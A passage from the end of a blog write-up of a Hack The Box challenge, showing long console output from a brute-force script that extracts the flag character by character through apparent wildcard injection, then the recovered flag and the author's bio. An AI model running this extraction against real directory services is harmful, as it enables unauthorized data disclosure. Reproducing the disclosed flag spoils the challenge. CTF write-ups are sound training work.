Trying: HTB{d1rectory_h4xx0r_is_kW*}
Trying: HTB{d1rectory_h4xx0r_is_kX*}
Trying: HTB{d1rectory_h4xx0r_is_kY*}
Trying: HTB{d1rectory_h4xx0r_is_kZ*}
Trying: HTB{d1rectory_h4xx0r_is_k0*}
Trying: HTB{d1rectory_h4xx0r_is_k0a*}
Trying: HTB{d1rectory_h4xx0r_is_k0b*}
Trying: HTB{d1rectory_h4xx0r_is_k0c*}
Trying: HTB{d1rectory_h4xx0r_is_k0d*}
Trying: HTB{d1rectory_h4xx0r_is_k0e*}
Trying: HTB{d1rectory_h4xx0r_is_k0f*}
Trying: HTB{d1rectory_h4xx0r_is_k0g*}
Trying: HTB{d1rectory_h4xx0r_is_k0h*}
Trying: HTB{d1rectory_h4xx0r_is_k0i*}
Trying: HTB{d1rectory_h4xx0r_is_k0j*}
Trying: HTB{d1rectory_h4xx0r_is_k0k*}
Trying: HTB{d1rectory_h4xx0r_is_k0l*}
Trying: HTB{d1rectory_h4xx0r_is_k0m*}
Trying: HTB{d1rectory_h4xx0r_is_k0n*}
Trying: HTB{d1rectory_h4xx0r_is_k0o*}
Trying: HTB{d1rectory_h4xx0r_is_k0p*}
Trying: HTB{d1rectory_h4xx0r_is_k0q*}
Trying: HTB{d1rectory_h4xx0r_is_k0r*}
Trying: HTB{d1rectory_h4xx0r_is_k0s*}
Trying: HTB{d1rectory_h4xx0r_is_k0t*}
Trying: HTB{d1rectory_h4xx0r_is_k0u*}
Trying: HTB{d1rectory_h4xx0r_is_k0v*}
Trying: HTB{d1rectory_h4xx0r_is_k0w*}
Trying: HTB{d1rectory_h4xx0r_is_k0x*}
Trying: HTB{d1rectory_h4xx0r_is_k0y*}
Trying: HTB{d1rectory_h4xx0r_is_k0z*}
Trying: HTB{d1rectory_h4xx0r_is_k0A*}
Trying: HTB{d1rectory_h4xx0r_is_k0B*}
Trying: HTB{d1rectory_h4xx0r_is_k0C*}
Trying: HTB{d1rectory_h4xx0r_is_k0D*}
Trying: HTB{d1rectory_h4xx0r_is_k0E*}
Trying: HTB{d1rectory_h4xx0r_is_k0F*}
Trying: HTB{d1rectory_h4xx0r_is_k0G*}
Trying: HTB{d1rectory_h4xx0r_is_k0H*}
Trying: HTB{d1rectory_h4xx0r_is_k0I*}
Trying: HTB{d1rectory_h4xx0r_is_k0J*}
Trying: HTB{d1rectory_h4xx0r_is_k0K*}
Trying: HTB{d1rectory_h4xx0r_is_k0L*}
Trying: HTB{d1rectory_h4xx0r_is_k0M*}
Trying: HTB{d1rectory_h4xx0r_is_k0N*}
Trying: HTB{d1rectory_h4xx0r_is_k0O*}
Trying: HTB{d1rectory_h4xx0r_is_k0P*}
Trying: HTB{d1rectory_h4xx0r_is_k0Q*}
Trying: HTB{d1rectory_h4xx0r_is_k0R*}
Trying: HTB{d1rectory_h4xx0r_is_k0S*}
Trying: HTB{d1rectory_h4xx0r_is_k0T*}
Trying: HTB{d1rectory_h4xx0r_is_k0U*}
Trying: HTB{d1rectory_h4xx0r_is_k0V*}
Trying: HTB{d1rectory_h4xx0r_is_k0W*}
Trying: HTB{d1rectory_h4xx0r_is_k0X*}
Trying: HTB{d1rectory_h4xx0r_is_k0Y*}
Trying: HTB{d1rectory_h4xx0r_is_k0Z*}
Trying: HTB{d1rectory_h4xx0r_is_k00*}
Trying: HTB{d1rectory_h4xx0r_is_k00a*}
Trying: HTB{d1rectory_h4xx0r_is_k00b*}
Trying: HTB{d1rectory_h4xx0r_is_k00c*}
Trying: HTB{d1rectory_h4xx0r_is_k00d*}
Trying: HTB{d1rectory_h4xx0r_is_k00e*}
Trying: HTB{d1rectory_h4xx0r_is_k00f*}
Trying: HTB{d1rectory_h4xx0r_is_k00g*}
Trying: HTB{d1rectory_h4xx0r_is_k00h*}
Trying: HTB{d1rectory_h4xx0r_is_k00i*}
Trying: HTB{d1rectory_h4xx0r_is_k00j*}
Trying: HTB{d1rectory_h4xx0r_is_k00k*}
Trying: HTB{d1rectory_h4xx0r_is_k00l*}
Trying: HTB{d1rectory_h4xx0r_is_k00la*}
Trying: HTB{d1rectory_h4xx0r_is_k00lb*}
Trying: HTB{d1rectory_h4xx0r_is_k00lc*}
Trying: HTB{d1rectory_h4xx0r_is_k00ld*}
Trying: HTB{d1rectory_h4xx0r_is_k00le*}
Trying: HTB{d1rectory_h4xx0r_is_k00lf*}
Trying: HTB{d1rectory_h4xx0r_is_k00lg*}
Trying: HTB{d1rectory_h4xx0r_is_k00lh*}
Trying: HTB{d1rectory_h4xx0r_is_k00li*}
Trying: HTB{d1rectory_h4xx0r_is_k00lj*}
Trying: HTB{d1rectory_h4xx0r_is_k00lk*}
Trying: HTB{d1rectory_h4xx0r_is_k00ll*}
Trying: HTB{d1rectory_h4xx0r_is_k00lm*}
Trying: HTB{d1rectory_h4xx0r_is_k00ln*}
Trying: HTB{d1rectory_h4xx0r_is_k00lo*}
Trying: HTB{d1rectory_h4xx0r_is_k00lp*}
Trying: HTB{d1rectory_h4xx0r_is_k00lq*}
Trying: HTB{d1rectory_h4xx0r_is_k00lr*}
Trying: HTB{d1rectory_h4xx0r_is_k00ls*}
Trying: HTB{d1rectory_h4xx0r_is_k00lt*}
Trying: HTB{d1rectory_h4xx0r_is_k00lu*}
Trying: HTB{d1rectory_h4xx0r_is_k00lv*}
Trying: HTB{d1rectory_h4xx0r_is_k00lw*}
Trying: HTB{d1rectory_h4xx0r_is_k00lx*}
Trying: HTB{d1rectory_h4xx0r_is_k00ly*}
Trying: HTB{d1rectory_h4xx0r_is_k00lz*}
Trying: HTB{d1rectory_h4xx0r_is_k00lA*}
Trying: HTB{d1rectory_h4xx0r_is_k00lB*}
Trying: HTB{d1rectory_h4xx0r_is_k00lC*}
Trying: HTB{d1rectory_h4xx0r_is_k00lD*}
Trying: HTB{d1rectory_h4xx0r_is_k00lE*}
Trying: HTB{d1rectory_h4xx0r_is_k00lF*}
Trying: HTB{d1rectory_h4xx0r_is_k00lG*}
Trying: HTB{d1rectory_h4xx0r_is_k00lH*}
Trying: HTB{d1rectory_h4xx0r_is_k00lI*}
Trying: HTB{d1rectory_h4xx0r_is_k00lJ*}
Trying: HTB{d1rectory_h4xx0r_is_k00lK*}
Trying: HTB{d1rectory_h4xx0r_is_k00lL*}
Trying: HTB{d1rectory_h4xx0r_is_k00lM*}
Trying: HTB{d1rectory_h4xx0r_is_k00lN*}
Trying: HTB{d1rectory_h4xx0r_is_k00lO*}
Trying: HTB{d1rectory_h4xx0r_is_k00lP*}
Trying: HTB{d1rectory_h4xx0r_is_k00lQ*}
Trying: HTB{d1rectory_h4xx0r_is_k00lR*}
Trying: HTB{d1rectory_h4xx0r_is_k00lS*}
Trying: HTB{d1rectory_h4xx0r_is_k00lT*}
Trying: HTB{d1rectory_h4xx0r_is_k00lU*}
Trying: HTB{d1rectory_h4xx0r_is_k00lV*}
Trying: HTB{d1rectory_h4xx0r_is_k00lW*}
Trying: HTB{d1rectory_h4xx0r_is_k00lX*}
Trying: HTB{d1rectory_h4xx0r_is_k00lY*}
Trying: HTB{d1rectory_h4xx0r_is_k00lZ*}
Trying: HTB{d1rectory_h4xx0r_is_k00l0*}
Trying: HTB{d1rectory_h4xx0r_is_k00l1*}
Trying: HTB{d1rectory_h4xx0r_is_k00l2*}
Trying: HTB{d1rectory_h4xx0r_is_k00l3*}
Trying: HTB{d1rectory_h4xx0r_is_k00l4*}
Trying: HTB{d1rectory_h4xx0r_is_k00l5*}
Trying: HTB{d1rectory_h4xx0r_is_k00l6*}
Trying: HTB{d1rectory_h4xx0r_is_k00l7*}
Trying: HTB{d1rectory_h4xx0r_is_k00l8*}
Trying: HTB{d1rectory_h4xx0r_is_k00l9*}
Trying: HTB{d1rectory_h4xx0r_is_k00l`*}
Trying: HTB{d1rectory_h4xx0r_is_k00l~*}
Trying: HTB{d1rectory_h4xx0r_is_k00l!*}
Trying: HTB{d1rectory_h4xx0r_is_k00l@*}
Trying: HTB{d1rectory_h4xx0r_is_k00l$*}
Trying: HTB{d1rectory_h4xx0r_is_k00l%*}
Trying: HTB{d1rectory_h4xx0r_is_k00l&*}
Trying: HTB{d1rectory_h4xx0r_is_k00l-*}
Trying: HTB{d1rectory_h4xx0r_is_k00l_*}
Trying: HTB{d1rectory_h4xx0r_is_k00l'*}
HTB{d1rectory_h4xx0r_is_k00l}
                                                                                                            
┌──(toor㉿kali)-[~/Downloads]
└─$ 
  • https://www.hackthebox.com/achievement/challenge/303878/153
Cogeanu Marius
Cogeanu Mariushttps://cogeanu.com
Marius Cogeanu is a distinguished IT consultant and cybersecurity virtuoso based in Prague, Czechia. With a rich 20-year journey in the IT realm, Marius has carved a niche in network security and technological solutions, adeptly harmonizing tech with business requirements. His experience spans from Kyndryl to IBM, and as a valued independent consultant, where he's renowned for his innovative approaches in enhancing business operations with cutting-edge tech.Marius's forte lies in demystifying complex IT concepts, ensuring clarity and alignment for stakeholders at all levels. His commitment to staying at the forefront of industry trends and seeking innovative solutions cements his status as a go-to expert in cybersecurity. Driven by a fervent passion for technology and its potential to revolutionize businesses, Marius thrives on tackling challenging ventures, applying his prowess in network design, IT service management, and strategic planning.Currently, Marius is focused on leading-edge IT project management, infrastructure design, and fortifying cybersecurity, guiding clients through the intricate digital landscape with unmatched expertise and insight.Discover more on https://cogeanu.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Popular Articles